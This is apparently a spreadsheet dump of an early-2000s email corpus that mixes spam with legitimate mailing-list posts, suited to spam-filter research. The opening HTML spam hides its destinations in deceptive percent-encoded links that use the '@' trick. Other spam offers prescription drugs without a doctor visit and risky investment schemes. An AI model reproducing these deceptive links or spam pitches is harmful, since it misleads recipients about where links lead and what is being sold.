         &lt;a href="http://%31%30%31%31%30%31%31%31%30%31%31%31%31%30%31%30%31%30%31%30%31%30%31%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%30%30%31%30%31%31%30%31%31%31%30%31%30%31%30%31%30%31%30%31%30%30%30%31%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31%31%30%31@%77%77%77%2E%67%74%65%72%2E%6E%65%74/%73%6D%74%68/%41%64%76%61%6E%63%65%64%45%64%75/%61%62%73%74%61%63%74/%61%62%73%74%61%63%74%30%30%31/%30%30%30%30%30%30%36%35%2E%68%74%6D Click Here"&gt;.&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%77%77%77%2E%7A%68%65%6E%67%78%69%6E%67%2E%63%6F%6D%2E%63%6E/%42%61%6E%68%65%6E/%42%30%30%31%2E%68%74%6D&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;/body&gt;&lt;/html&gt;
 lsfkipmibgahrvnqejmwhyplbyts
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Toners and inkjet cartridges for less.... RGCSOPMX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</si>
  <si>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warreng
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Jul 21, 2002 at 09:11:08AM -0500, Brian Fahrlander wrote:
 &gt; On Sun, 21 Jul 2002 15:12:11 -0400, che &lt;che666@uni.de&gt; wrote:
 &gt; &gt; &gt; &gt; &gt; The server mentioned above works again now :)!
 &gt; &gt; &gt; &gt; Any problems with the rpm's they provided?
 &gt; &gt; &gt; #redhat 7.3
 &gt; &gt; &gt; rpm http://apt.sunnmore.net gnome2 73
 &gt; &gt; &gt; rpm-src http://apt.sunnmore.net gnome2 73
 &gt; &gt; after apt-get install gnome-session
 &gt;     Does it work more than once?
 &gt;     Failed to fetch http://apt.sunnmore.net/gnome2/filename-here.rpm
 &gt;    404 Not Found
 I got that with the earlier URL. Those that say 73/72 at the end work,
 though.
 I just installed gnome-terminal and I'm impressed by that. I have seom
 gtk1 apps to rebuild and put into my own repository (like gaim) so I
 didn't do the full session install. Besides, it's HUGE. And it wants to
 install stuff like kudzu and parted and who knows what. What's wrong
 with dynamic configuration? Dependency hell indeed.
 -- 
 &gt; wd0: 1671040 partitions found
 That's a lie. Ignore it.
 		-- Seen on xMach mailing list
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Prescriptions Without Doctors Appointment..........
</t>
  </si>
  <si>
    <t xml:space="preserve">
 The Internet's Online Pharmacy
 Viagra - Xenical - Propecia - Claritin - Celbrex - Renova - Zyban
 Now get your prescriptions approved by a panel of licensed medical doctors online without the need for an office visit.
 After approval of the doctor the medication will be shipped right to your door.
 Visit The Internets Online Pharmacy by clicking the link below:
 http://pharm5.onchina.net/
 To be removed from future mailings send an email to unlist4me@yahoo.com with remove in the subject
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-09-03
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 This Week on perl5-porters (26 August / 1st September 2002)
     posted by rafael on Monday September 02, @03:47 (summaries)
     http://use.perl.org/article.pl?sid=02/09/02/0755208
 The Perl Review, v0 i5
     posted by ziggy on Monday September 02, @14:20 (news)
     http://use.perl.org/article.pl?sid=02/09/02/1823229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</si>
  <si>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Ripped from
 http://www.hpl.hp.com/personal/Jean_Tourrilhes/Linux/Linux.Wireless.usage.html
 " 11 Access Points, Home Gateways and Ethernet bridging
 Most Access Points act as a MAC level bridge, allowing the Wireless LAN to 
 be a natural extension of a wired network. They are deployed in a cellular 
 fashion, and provide extended security, management and roaming.
 On the other hand, the Home Gateways allow a single cell to be connected to 
 a WAN, like a modem, a cable modem or a DSL access. The set of features is 
 quite different, and they offer NAT/masquerading and PPP configuration.
 The conventional Ethernet bridging method (promiscuous sniffing) doesn't 
 work with most wireless LAN standard, because of the header encapsulation 
 and the interactions with link layer retransmissions. In other word, most 
 often, when you use a software bridge on a wireless LAN (such as the Linux 
 bridge on a 802.11 card), it doesn't work (moreover, quite often promiscuous 
 is broken as well). "
 [[ What the?? What is he talking about?? Aren't we all using Linux to bridge 
 our networks? ]]
 " The driver could work around this restriction by creating its own MAC 
 headers (802.11 headers instead of 802.3, and putting the right bits in the 
 right place), but in fact most vendors don't provide the specification on 
 how to this with their hardware (when they don't explicitely prevent it in 
 hardware, to force you to buy their Access Points).
 In other words, don't expect to use your Linux PC as a wireless bridge or 
 wireless Access Points with most products out there, and forget about 
 turning it into an Access Point. Of course, there is some exceptions. "
 [[ Is this true? ]]
 " The workaround is to set the wireless LAN in ad-hoc mode and to use other 
 methods, such as routing, masquerading, IP bridging, ARP proxying... "
 [[ Yes, I am in a process of building a wireless-lan &lt;-&gt; wired-lan bridge. 
 But I don't understand what this guy is talking about. Anyone?
 Vince. ]]
 _________________________________________________________________
 MSN Photos is the easiest way to share and print your photos: 
 http://photos.msn.com/support/worldwide.aspx
 To unsubscribe: send mail to majordomo@wireless.org.au
 with "unsubscribe melbwireless" in the body of the message
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: bad DCC traffic from e-corp.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Vernon,
 I'm changing the instructions in the SpamAssassin INSTALL file 
 right now to:
 tar xfvz dcc-dccproc.tar.Z
 cd dcc-dccproc-X.X.X
 ./configure &amp;&amp; make &amp;&amp; make install
 cdcc 'info'
 Let me know ASAP if that's innapropriate, since we're shipping 
 2.40 today!
 C
 On Monday, September 2, 2002, at 10:02  AM, Vernon Schryver wrote:
 &gt;&gt; Here are the instructions in the spamassassin README:
 &gt;&gt;
 &gt;&gt;     # tar xfvz dcc-dccproc.tar.Z
 &gt;&gt;     # cd dcc-dccproc-X.X.X
 &gt;&gt;     # ./configure &amp;&amp; make &amp;&amp; make install
 &gt;&gt;     # cdcc 'new map'
 &gt;&gt;     # cdcc 'add dcc.rhyolite.com'
 &gt;&gt;     # cdcc 'info'
 &gt;
 &gt; That's ok, except that the 'new map' and "add dcc.rhyolite.com'
 &gt; are respectively unnecessary and wrong.  The map file that comes
 &gt; with the source points to localhost and dcc.dcc-servers.net.  Those
 &gt; two shipped entries usually do the right thing if there is a local
 &gt; server.  If there is no local server or if the local server fails,
 &gt; requests are instantly sent to one of the public server names listed
 &gt; in the main DCC web page at
 &gt; http://www.rhyolite.com/anti-spam/dcc/ and http://www.dcc-
 &gt; servers.net/dcc/
 &gt; dcc.rhyolite.com has not been listed for months.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: a problem with apt-get
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 In my build scripts, I have problems with some of the kernel packages.
 For kernel-sources, I get :
 Package kernel-source is a virtual package provided by:
   kernel-source#2.4.18-3 2.4.18-3
   kernel-source#2.4.18-3 2.4.18-3
 on running apt-get install kernel-source
 Now, first of all, this doesn't really tell me what the two options are ;)
 Second, is there some way I can tell apt-get to install either ? This is 
 done from automatic build scripts so I'd like it to proceed anyway.
 Thanks,
 Thomas
 -- 
 The Dave/Dina Project : future TV today ! - http://davedina.apestaart.org/
 &lt;-*-                      -*-&gt;
 I'm alive.
 I can tell because of the pain.
 &lt;-*- thomas@apestaart.org -*-&gt;
 URGent, the best radio on the Internet - 24/7 ! - http://urgent.rug.ac.be/
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On 8 Sep 2002 at 22:15, Geege Schuman wrote:
 &gt; who watched Lathe of Heaven?  (A&amp;E, 8 pm EDT)  who has seen
 &gt; the original?
 &gt; 
 By "original" if you are referring to the old PBS version, I liked that version much better.  Much more thought provoking.
</t>
  </si>
  <si>
    <t xml:space="preserve">Urban Boquist wrote:
 &gt; Hi Matt, and thanks for your quick reply.
 &gt; 
 &gt; Matt&gt; Don't run SA on mails this large.
 &gt; 
 &gt; That would be fine, if I only understood how I should do that. I can't
 &gt; find anything in the SA documention that mentions some kind of upper
 &gt; limit for the size of a message. What should I put in my user_prefs
 &gt; file?
 &gt; 
 &gt; I run SA from procmail btw, but I can't imagine that procmail would be
 &gt; able to check the size of a message before handing it over to SA?
 That's exactly what it can do:
 :0fw &lt;250000
 | spamassassin -P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</si>
  <si>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--==_Exmh_-518574644P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Anders Eriksson &lt;aeriksson@fastmail.fm&gt;
 &gt; Date:  Thu, 22 Aug 2002 18:55:03 +0200
 &gt;
 &gt; 
 &gt; 
 &gt; 
 &gt; &gt; &gt; &gt; &gt; Just cvs up'ed and nowadays Catch-up Unseen is __extremely__ slow o
 &gt; n 
 &gt; &gt; &gt; &gt; &gt; large (&gt;100 msgs) unseen sequences. Anybody else having this proble
 &gt; m?
 &gt; &gt; &gt; &gt; 
 &gt; &gt; &gt; &gt; I'll take the blame.
 &gt; &gt; &gt; &gt; 
 &gt; &gt; &gt; &gt; The reason, I suspect, is that we're needlessly reading the .sequence
 &gt; s file 
 &gt; &gt; &gt; &gt; multiple times because of other sequences.  I need to make the code m
 &gt; uch 
 &gt; &gt; &gt; &gt; smarter about handling that file, but first I have a few other fish t
 &gt; o fry in 
 &gt; &gt; &gt; &gt; my rather large patch that's on it's way.
 &gt; &gt; &gt; &gt; 
 &gt; &gt; &gt; 
 &gt; &gt; &gt; No panic,
 &gt; &gt; &gt; 
 &gt; &gt; &gt; I'm all for cleaning things up before getting it optimized.
 &gt; &gt; 
 &gt; &gt; Okay, this fix is now checked in.
 &gt; &gt; 
 &gt; I'm afraid it didn't help. It still seems to be slower than ~1 month 
 &gt; ago. Maybe slightly faster than yeasterday. I'm (still) seeing an 
 &gt; "unseen countdown" in the log.
 Okay....Catchup unseen is something that I don't use often, but i can 
 certainly reproduce this.  I'll dig into it.  It's probably simple.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-518574644P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9ZR4aK9b4h5R0IUIRAub4AKCE9sxZQfiRl18xhrtT2WLrEqEucACeJGm0
 YdhaA8YocKvlkyW4sTIZ3lU=
 =XhOQ
 -----END PGP SIGNATURE-----
 --==_Exmh_-518574644P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: British dossier on Iraqi weapons released
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8202806,1440/
 Date: Not supplied
 It claims Iraq is ready to use chemical weapons and is pursuing long-range 
 missiles, but it lacks dramatic new evidence likely to win over war sceptics
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: The Gold Buddha
</t>
  </si>
  <si>
    <t xml:space="preserve">In 1957, a monastery in Thailand was being relocated and a group of monks
 was put in charge of moving a giant clay Buddha. In the midst of the move
 one of the monks noticed a crack in the Buddha. Concerned about damaging the
 idol, the monks decided to wait for a day before continuing with their task.
 When night came, one of the monks came to check on the giant statue. He
 shined his flashlight over the entire Buddha. When he reached the crack he
 saw something reflected back at him. The monk, his curiosity aroused, got a
 hammer and a chisel and began chipping away at the clay Buddha. As he
 knocked off piece after piece of clay, the Buddha got brighter and brighter.
 After hours of work, the monk looked up in amazement to see standing before
 him a huge solid-gold Buddha.
 Many historians believe the Buddha had been covered with clay by Thai monks
 several hundred years earlier before an attack by the Burmese army. They
 covered the Buddha to keep it from being stolen. In the attack all the monks
 were killed, so it wasn't until 1957, when the monks were moving the giant
 statue, that the great treasure was discovered. Like the Buddha, our outer
 shell protects us from the word: our real treasure is hidden within. We
 human beings unconsciously hide our inner gold under a layer of clay. All we
 need to do to uncover our gold is to have the courage to chip away at our
 outer shell, piece by piece.
 Could you be sitting on your own gold mine? Did you know the average
 American can retire a millionaire on his or her current income? Then, why
 don't they? It's simple. They haven't been taught that they could. They are
 taught to use debt to get what they want now instead of having their money
 work for them. They pay too much in taxes. They are wasting money every
 month and don't even realize it. In short, they are financially unhealthy.
 Get a financial checkup and a free video on how to become "Financially Fit
 For Life" and discover the gold within your current income.
 Get your FREE 3-Point Checkup and Video Now!
 http://216.190.209.155/finfit/checkup.html
 ----------------------------------------------------------------------------
 To unsubscribe, email removeme@speededelivery.com with the subject "Remove".
 SpeedeDelivery . Jordan Commons Tower 
 9350 South 150 East
 Sandy, UT 84070
 ----------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I've been snowed under for the last four weeks, working on the
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20021002.html
 Date: Not supplied
 I've been snowed under for the last four weeks, working on the FogBUGZ 3.0 
 Setup program. 
 For various reasons none of the commercial setup toolkits (Wise, InstallShield, 
 Windows Installer) could do even 25% of what our setup program needed to do, so 
 I ended up writing it from scratch. VC++ and MFC all the way. It took longer 
 than I expected because I had this weird conviction that the entire setup 
 process should be completely reversable, and as you go backwards through the 
 wizard it should automatically and silently undo any changes it had already 
 made. So even if you're looking at the last screen, if you decide you want to 
 change where to extract the files, you can just back up and change it and 
 everything moves and all the old files you overwrote are put back and all the 
 Windows accounts you created are uncreated and all the permissions we granted 
 are ungranted and the SQL database you made is unmade and so on. The end result 
 is a great setup program, but it may be a tad overkill. If I have time I'll 
 write more about what I learned. 
 One benefit of writing a setup program from scratch is that I don't have to 
 have someone else's stupid cartoon-of-a-computer-and-floppy-disks in the upper 
 right hand corner. I used a photograph of the London Skyline, currently 
 infested with cranes. I took the picture from the cafe at the Tate Modern. 
 [IMG: http://www.joelonsoftware.com/pictures/fbsetup.jpg (FogBUGZ 3.0 Setup)]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Iraq is next
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00E4_86E61E0A.B5488E11
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PCEtLSBzYXZlZCBmcm9tIHVybD0oMDAyMilodHRwOi8vaW50ZXJuZXQuZS1t
 YWlsIC0tPg0KPGh0bWw+DQo8Ym9keT4NCjxibG9ja3F1b3RlPg0KICA8cCBh
 bGlnbj0ibGVmdCI+PGZvbnQgc2l6ZT0iNiI+PGZvbnQgY29sb3I9IiMwMDAw
 RkYiPlN0b2NrIE1hcmtldCBCbHVlcyBnb3QgeW91IGRvd24/PC9mb250PiZu
 YnNwOzwvZm9udD48YnI+DQogIDxicj4NCiAgPGZvbnQgc2l6ZT0iNSIgY29s
 b3I9IiNGRjAwMDAiPkxvb2tpbmcgZm9yIGEgdmlhYmxlIGFuZCBsZWdpdGlt
 YXRlIGFsdGVybmF0aXZlPyZuYnNwOzwvZm9udD48Zm9udCBzaXplPSI0Ij48
 YnI+DQogIDwvZm9udD48YnI+DQogIDxmb250IHNpemU9IjQiPldoYXQgZG8g
 eW91IHRoaW5rIHdpbGwgaGFwcGVuIHRvIHVubGVhZGVkIGdhc29saW5lIHBy
 aWNlcyBiZXR3ZWVuIG5vdyBhbmQgdGhpcyBzdW1tZXI/Jm5ic3A7PGJyPg0K
 ICA8YnI+DQogIERpZCB5b3Uga25vdyB0aGF0IHRoZXJlIGhhc24ndCBiZWVu
 IGEgbmV3IHJlZmluZXJ5IGJ1aWx0IGluIHRoZSBVbml0ZWQgU3RhdGVzIGlu
 IG92ZXIgMjAgeWVhcnM/Jm5ic3A7PGJyPg0KICA8YnI+DQogIERvIHlvdSBr
 bm93IHRoYXQgeW91IGNhbiB0cmFkZSBvcHRpb25zIG9uIHVubGVhZGVkIGdh
 c29saW5lIGNvbnRyYWN0cyBvbiB0aGUgTmV3IFlvcmsgTWVyY2FudGlsZSBF
 eGNoYW5nZSwNCiAgYSBnb3Zlcm5tZW50IHJlZ3VsYXRlZCBleGNoYW5nZT8g
 IFdlIGFyZSB0aGUgcHJvZmVzc2lvbmFscyB3aG8gc3BlY2lhbGl6ZSBpbiB0
 aGVzZSBtYXJrZXRzIGFuZCB0cmFkZSB0aGVtIG9uIGEgcmVndWxhciBiYXNp
 cy4mbmJzcDs8YnI+DQogIDxicj4NCiAgUmVjZWl2ZSB5b3VyIGZyZWUgcmVw
 b3J0LCBpbmNsdWRpbmcgdGhlIGJvb2tsZXQgIjI2IFBsYWluIExhbmd1YWdl
 IEFuc3dlcnMgb24gT3B0aW9ucyBUcmFkaW5nIi4mbmJzcDs8YnI+DQogIDxi
 cj4NCiAgR2V0IHRoZSBjaGFydHMsIGdyYXBocyBhbmQgdGhlIHNwZWNpYWwg
 cmVwb3J0IG9uIFVubGVhZGVkIEdhc29saW5lIC0gU3VtbWVyIDIwMDIuJm5i
 c3A7PGJyPg0KICBGdXR1cmVzIGFuZCBvcHRpb25zIHRyYWRpbmcgaW52b2x2
 ZSBzdWJzdGFudGlhbCByaXNrIG9mIGxvc3MgYW5kIGlzIG5vdCBzdWl0YWJs
 ZSBmb3IgZXZlcnlvbmUuJm5ic3A7PGJyPg0KICA8YnI+DQogIExlYXJuIGhv
 dyBvcHRpb25zIHRyYWRpbmcgY2FuIHBvc2l0aW9uIHlvdSBpbiB0aGlzIGFt
 YXppbmcgbWFya2V0LiZuYnNwOzxicj4NCiAgPGJyPg0KICA8YSBocmVmPSJo
 dHRwOi8vd3d3LmludmVzdG1lbnQ0dS5jb20vU3BlY2lhbFJlcG9ydC8iPkNs
 aWNrIGhlcmU8L2E+IGFuZCB5b3Ugd2lsbCByZWNlaXZlIHRoZSBVbmxlYWRl
 ZCBHYXNvbGluZSBzcGVjaWFsIHJlcG9ydC4mbmJzcDs8YnI+DQogICQ1LDAw
 MCB3aWxsIHB1cmNoYXNlIGZpdmUgVW5sZWFkZWQgR2Fzb2xpbmUgb3B0aW9u
 IGNvbnRyYWN0cy4mbmJzcDs8YnI+DQogIE1pbmltdW0gJDUsMDAwIGludmVz
 dG1lbnQuJm5ic3A7PGJyPg0KICBUYWtlIGFkdmFudGFnZSBvZiB3aGF0IHdl
 IGJlbGlldmUgaXMgYW4gb3V0c3RhbmRpbmcgaW52ZXN0bWVudCBvcHBvcnR1
 bml0eSEmbmJzcDs8YnI+DQogIDxicj4NCiAgPGEgaHJlZj0iaHR0cDovL3d3
 dy5pbnZlc3RtZW50NHUuY29tL1NwZWNpYWxSZXBvcnQvIj5DbGljayBIZXJl
 IE5PVyE8L2E+Jm5ic3A7PGJyPg0KICA8YnI+DQogIDwvZm9udD48Zm9udCBz
 aXplPSIzIj48YSBocmVmPSJodHRwOi8vd3d3LmludmVzdG1lbnQ0dS5jb20v
 dGFrZW1lb2ZmLyI+Q2xpY2sgSGVyZSBUbyBiZSB0YWtlbiBvZmYgdGhlIGxp
 c3QhDQogIDwvYT48L2ZvbnQ+PC9wPg0KPC9ibG9ja3F1b3RlPg0KDQo8L2Jv
 ZHk+DQoNCjwvaHRtbD4NCg0KDQo3NzUxUXNZZjYtNTgyV3JFUDU3ODZWaklG
 NS0zNzJvUmZNMGwzMw==
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: World Wide Words -- 03 Aug 02
</t>
  </si>
  <si>
    <t xml:space="preserve">WORLD WIDE WORDS          ISSUE 301          Saturday 3 August 2002
 -------------------------------------------------------------------
 Sent each Saturday to 15,000+ subscribers in at least 119 countries
 Editor: Michael Quinion, Thornbury, Bristol, UK      ISSN 1470-1448
 &lt;http://www.worldwidewords.org&gt;      &lt;TheEditor@worldwidewords.org&gt;
 -------------------------------------------------------------------
  IF YOU RESPOND TO THIS MAILING, REMEMBER TO CHANGE THE OUTGOING
    ADDRESS TO ONE OF THOSE IN THE 'CONTACT ADDRESSES' SECTION.
 Contents
 -------------------------------------------------------------------
 1. Feedback, notes and comments.
 2. Turns of Phrase: Thinspiration.
 3. Weird Words: Usufructuary.
 4. Q&amp;A: Three sheets to the wind; Mogadored; Skunk works.
 5. Endnote.
 6. Subscription commands.
 7. Contact addresses.
 1. Feedback, notes and comments
 -------------------------------------------------------------------
 COCKLES OF ONE'S HEART  You may recall that I was a bit suspicious
 of the story I told in last week's issue. James Woodfield pointed
 out that there is another possible explanation. In medieval Latin,
 the ventricles of the heart were at times called "cochleae cordis",
 where the second word is derived from "cor", heart. Those unversed
 in Latin could have misinterpreted "cochleae" as "cockles". Oddly,
 "cochlea" in Latin means "snail" (from the shape of the ventricles
 - it's also the name of the spiral cavity of the inner ear), so if
 this story is right we should really be speaking of warming the
 snails of one's heart.
 SERRANCIFIED  Many of you supplied your own memories of this odd
 expression that I tried to make sense of last week. Taken together,
 they show that the expression is best known in Canada and that it
 was originally something like "My sufficiency has been suffonsified
 and anything additional would be superfluous". That form of the
 word is the one that is most common in online searches, where the
 Canadian focus is also obvious. Cheryl Caesar noted that it appears
 in a passage in Margaret Atwood's novel, "Cat's Eye": she has two
 teenage girls living in Toronto in the 1940s who say, "Are you
 sufficiently sophonisified?". A Vancouver restaurant reviewer has
 the pen name "Sufficiently Suffonsified". Oddly, there's also a
 1999 record by the Austrian band Cunning Dorx entitled "Paradigms
 Suffonsified". G H Gordon Paterson suggested that the word might be
 a punning blend of "sufficient" and "fancified". There are some
 tantalising suggestions that it may actually be Scots, and not New
 World at all.
 ABSQUATULATE  I have been gently remonstrated with for describing
 "sockdologer" as one of the products of early American linguistic
 inventiveness that hasn't survived to the present day. Many people
 gave me examples of current or recent use. I stand corrected.
 2. Turns of Phrase: Thinspiration
 -------------------------------------------------------------------
 This is one of the key words associated with a deeply disquieting
 online trend. In the past couple of years or so a number of Web
 sites and chatrooms have appeared which actively promote anorexia
 nervosa (known on the sites as "ana") and other eating disorders as
 lifestyle choices. Since 90% of anorexics are young women, these
 "pro-ana" sites are usually run by and attract that group (one term
 sometimes used for them is "weborexics"). Sites offer suggestions
 on how to become and remain thin, often through tips on avoiding
 eating, and how to disguise the condition from family and friends.
 Other themes sometimes featured on such sites are self-mutilation
 ("cutting") and bulimia ("mia"). Thin women, such as supermodels
 and Calista Flockhart, are presented as "thinspirations", examples
 to emulate. Sites have had names such as Starving for Perfection,
 Wasting Away on the Web and Dying To Be Thin. Medical professionals
 in the US and UK are deeply concerned about them, because they
 accentuate the low self-regard of young women, who are particularly
 prone to eating disorders, put their lives at risk, and discourage
 them from facing their illness and seeking treatment for it.
 The Internet is home to a number of pro-eating disorder Web sites -
 - places where sufferers can discuss tips, trade low-calorie
 recipes and exchange poems and art that may be used as "triggers"
 or so-called "thinspiration."
                                          ["Calgary Sun", Feb. 2002]
 A new trend among young adults has been sweeping the nation: pro-
 anorexia Web sites. Also known as pro-ana, these sites glorify
 anorexia nervosa and offer "thinspiration" on maintaining a
 starvation lifestyle.
                                      ["University Wire", Apr. 2002]
 3. Weird Words: Usufructuary  /ju:zjU'frVktju:@rI/
 -------------------------------------------------------------------
 A person who has the use or enjoyment of something, especially
 property.
 We are short of words that contain four u's. Among the few that are
 even relatively common (leaving aside the Hawaiian "muu-muu") are
 "tumultuously" and "unscrupulous", although some rare words like
 "pustulocrustaceous" and "pseudotuberculous" are also recorded.
 The term comes from Roman law. "Usufruct" is the right of temporary
 possession or enjoyment of something that belongs to somebody else,
 so far as that can be done without causing damage or changing its
 substance. For example, a slave in classical Rome could not own
 anything. Things he acquired as the result of his labour he merely
 held "usus (et) fructus", under "use (and) enjoyment" - it was his
 master who actually owned them.
 The term remains in use in modern US legal practice and elsewhere.
 These days a "usufructuary" can be a trustee who enjoys the income
 from property he holds in trust for somebody else. Many Native
 American groups hold land on a "usufruct" basis, with rights to
 enjoy the renewable natural resources of the land for hunting and
 fishing.
 4. Q&amp;A
 -------------------------------------------------------------------
 Q. How does the term "three sheets to the wind" denote drunkenness?
 [Benjamin Weatherston]
 A. It's a sailor's expression.
 We ignorant landlubbers might think that a sheet is a sail, but in
 traditional sailing-ship days, a "sheet" was actually a rope,
 particularly one attached to the bottom corner of a sail (it comes
 from an Old English term for the corner of a sail). The sheets were
 vital, since they trimmed the sail to the wind. If they ran loose,
 the sail would flutter about in the wind and the ship would wallow
 off its course out of control.
 Extend this idea to sailors on shore leave, staggering back to the
 ship after a good night on the town, well tanked up. The irregular
 and uncertain locomotion of the jolly seafarers must have reminded
 onlookers of the way a ship moved in which the sheets were loose.
 Perhaps one loose sheet might not have been enough to get the image
 across, so the saying became "three sheets to the wind".
 Our first written example comes from that recorder of low life,
 Pierce Egan, in his "Real life in London" of 1821. But it must
 surely be much older.
                         -----------
 Q. My East End mother-in-law used to say she was "well and truly
 mogadored" when she was puzzled by something. Any idea of
 derivation and meaning? [Bryan]
 A. Now that's a bit of British slang I haven't heard in years,
 though it is still around (Nanny Ogg uses it in one of Terry
 Pratchett's Discworld fantasy stories, I am told). As you say, it
 means that somebody is puzzled, confused, or "all at sea". It's
 also sometimes spelled "moggadored", though it doesn't turn up in
 print much in either spelling. (No relation to the British word
 "moggy" for a cat, by the way, which seems to be a pet form of
 "Margaret".)
 The writers of slang dictionaries are decidedly mogadored about its
 origin. It looks very much like rhyming slang for "floored", which
 is likewise slang, meaning dumbfounded or confused. But the dispute
 arises over what the root is. Some say it is Irish, from "magagh",
 to mock, jeer or laugh at, via an unrecorded intermediate form
 "mogadi".
 Others suggest that, like some other East End slang terms, it
 derives from the Gypsy language Romany (Cockney slang is like
 London itself, a melting pot, in which words from many sources are
 amalgamated, including Yiddish and old-time forces slang derived
 from languages around the world). In this case the source may be
 "mokardi" or "mokodo", something tainted (these Romany words also
 provide the root for yet another slang phrase, "to put the mockers
 on something", to jinx it).
 Sorry not to be able to be more definite!
                         -----------
 Q. I was having an interesting discussion with an American
 professor of business studies who also consults to industry. She
 was recalling an unbudgeted initiative within a major software
 corporate, which the UK managing director described as a "skunk
 project". I have seen this epithet before, usually in the phrase
 "skunk works", meaning a semi-official project team that is tacitly
 licensed to bend the rules and think outside the box. I wonder what
 the derivation is? I don't think it can refer to the smelly wild
 animal, but neither I think can it refer to the street term for a
 strong variant of marijuana. Can you shed any light? [Martin
 Hayman]
 A. We must start in Dogpatch, the fictional place in the backwoods
 of upper New York State made famous between 1934 and 1977 as the
 home of professional mattress tester Li'l Abner, in the comic strip
 written and drawn by Al Capp. The original was actually "Skonk
 Works", the place where Lonesome Polecat and Hairless Joe brewed
 their highly illicit bootleg Kickapoo Joy Juice from ingredients
 such as old shoes and dead skunks. ("Skonk" is a dialect variant of
 "skunk".)
 We must now move to the very real Burbank, California. In 1943, a
 small group of aeronautical engineers working for the then Lockheed
 Aircraft Corporation (headed by Clarence "Kelly" Johnson) were
 given the rush job of creating an entirely new plane from scratch,
 the P-80 "Shooting Star" jet fighter. This they did in 143 days, 37
 days ahead of schedule. Their secret project was housed in a
 temporary structure roofed over with an old circus tent, which had
 been thrown up next to a smelly plastics factory. The story goes
 that one of the engineers answered the phone on a hot summer day
 with the phrase "Skonk Works here" and the name stuck. It is also
 said that Al Capp objected to their use of his term and it was
 changed to Skunk Works.
 One division of the company, formally the Lockheed Martin Advanced
 Development Program, is still known as the Skunk Works. The term
 has been trademarked by Lockheed Martin, who have been aggressive
 in protecting it.
 As a generic term, it dates from the 1960s. One definition is very
 much that of the original and the one you describe: a small group
 of experts who drop out of the mainstream of a company's operations
 in order to develop some experimental technology or new application
 in secrecy or at speed, unhampered by bureaucracy or the strict
 application of regulations (Kelly Johnson formulated 14 visionary
 rules for running such an operation, which are still regarded as
 valid even now). It is also sometimes used for a similar group that
 operates semi-illicitly, without top-level official knowledge or
 support, though usually with the tacit approval of immediate
 management.
 5. Endnote
 -------------------------------------------------------------------
 The principal design of a grammar of any language is to teach us to
 express ourselves with propriety in that language; and to enable us
 to judge of every phrase and form of construction, whether it be
 right or not. [Robert Lowth, "A Short Introduction to English
 Grammar" (1762)]
 6. Subscription commands
 -------------------------------------------------------------------
 To leave the list, change your subscription address, or subscribe,
 please visit &lt;http://www.worldwidewords.org/wordlist.htm&gt;.
 Or, you can send a message to &lt;listserv@listserv.linguistlist.org&gt;
 from the address at which you are (or want to be) subscribed:
   To leave, send: SIGNOFF WORLDWIDEWORDS
   To join, send: SUBSCRIBE WORLDWIDEWORDS First-name Last-name
 7. Contact addresses
 -------------------------------------------------------------------
 Do not use the address that comes up when you hit 'Reply' on this
 mailing, or your message will be sent to an electronic dead-letter
 office. Either create a new message, or change the outgoing 'To:'
 address to one of these:
   For general comments, especially responses to Q&amp;A pieces:
       &lt;TheEditor@worldwidewords.org&gt;.
   For questions intended for reply in a future Q&amp;A feature:
       &lt;QandA@worldwidewords.org&gt;.
 -------------------------------------------------------------------
 World Wide Words is copyright (c) Michael Quinion 2002.  All rights
 reserved. The Words Web site is at &lt;http://www.worldwidewords.org&gt;.
 -------------------------------------------------------------------
 You may reproduce this newsletter in whole or in part in other free
 media online provided that you include this note and the copyright
 notice above. Reproduction in print media or on Web pages requires
